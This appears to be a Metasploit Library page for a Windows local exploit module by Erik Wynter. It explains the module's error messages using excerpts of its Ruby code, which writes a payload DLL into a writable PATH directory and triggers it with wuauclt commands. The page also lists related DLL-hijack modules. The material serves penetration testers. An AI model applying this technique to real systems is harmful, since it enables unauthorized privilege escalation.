Exploitation cannot proceed stealthily. If you still want to exploit, set `STEALTH_ONLY` to false.
Here is a relevant code snippet related to the "Exploitation cannot proceed stealthily. If you still want to exploit, set `STEALTH_ONLY` to false." error message:
321:
322: case @wupdate_setting
323: when 1
324: print_warning('Because Windows Update is set to never check for updates, triggering the payload requires launching the Windows Update window on the target.')
325: if stealth_only
326: fail_with(Failure::Unknown, 'Exploitation cannot proceed stealthily. If you still want to exploit, set `STEALTH_ONLY` to false.')
327: return
328: end
329: trigger_cmd = 'wuauclt /selfupdatemanaged'
330: when 2..4
331: # trigger the payload in the background if we can
Windows Update is not configured or returned an unexpected value. Exploitation may not work.
Here is a relevant code snippet related to the "Windows Update is not configured or returned an unexpected value. Exploitation may not work." error message:
330: when 2..4
331: # trigger the payload in the background if we can
332: trigger_cmd = 'wuauclt /detectnow'
333: else
334: # if this is true, ForceExploit has been set and we should just roll with it
335: print_warning('Windows Update is not configured or returned an unexpected value. Exploitation may not work.')
336: if stealth_only
337: trigger_cmd = 'wuauclt /detectnow'
338: else
339: # go out guns blazing and hope for the best
340: print_status('The module will launch the Windows Update window on the target in an attempt to trigger the payload.')
Using ForceExploit requires `WRITABLE_PATH_DIR` to be set.
Here is a relevant code snippet related to the "Using ForceExploit requires `WRITABLE_PATH_DIR` to be set." error message:
343: end
344:
345: # select a target directory to write the payload to
346: if @writable_path_dirs.empty? # this means ForceExploit is being used
347: if provided_path_dir.blank?
348: fail_with(Failure::BadConfig, 'Using ForceExploit requires `WRITABLE_PATH_DIR` to be set.')
349: end
350:
351: dll_path = provided_path_dir
352: else
353: dll_path = @writable_path_dirs[0]
Go back to menu.
Related Pull Requests
- #15575 Merged Pull Request: Update Gemfile.lock
- #15556 Merged Pull Request: Add shell support to enum_unattended module
- #15564 Merged Pull Request: Update post_common mixin methods to support powershell session type
- #15570 Merged Pull Request: Fix smb enum gpp module
- #15546 Merged Pull Request: Fix #15480, fix IgnoreUnknownPayloads for stageless reverse_http payloads
- #15561 Merged Pull Request: Add an exploit for ProxyShell
- #15525 Merged Pull Request: Add Lucee Administrator CVE-2021-21307 exploit
- #15332 Merged Pull Request: fix a localization issue and some other minor issues in
rename_file
method - #15540 Merged Pull Request: Add option for running
cmd_execute
in a subshell - #15303 Merged Pull Request: Fix
dir
method for windows shell sessions
References
See Also
Check also the following modules related to this module:
- exploit/windows/local/dnsadmin_serverlevelplugindll
- exploit/windows/browser/juniper_sslvpn_ive_setupdll
- exploit/windows/browser/ms10_046_shortcut_icon_dllloader
- exploit/windows/browser/webdav_dll_hijacker
- exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader
- exploit/windows/fileformat/office_ole_multiple_dll_hijack
- exploit/windows/http/amlibweb_webquerydll_app
- exploit/windows/http/generic_http_dll_injection
- exploit/windows/iis/ms03_007_ntdll_webdav
- exploit/windows/misc/ibm_director_cim_dllinject
- exploit/windows/misc/vmhgfs_webdav_dll_sideload
- exploit/windows/smb/generic_smb_dll_injection
- exploit/windows/smb/ms10_046_shortcut_icon_dllloader
- exploit/windows/smb/ms15_020_shortcut_icon_dllloader
Authors
- Erik Wynter
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.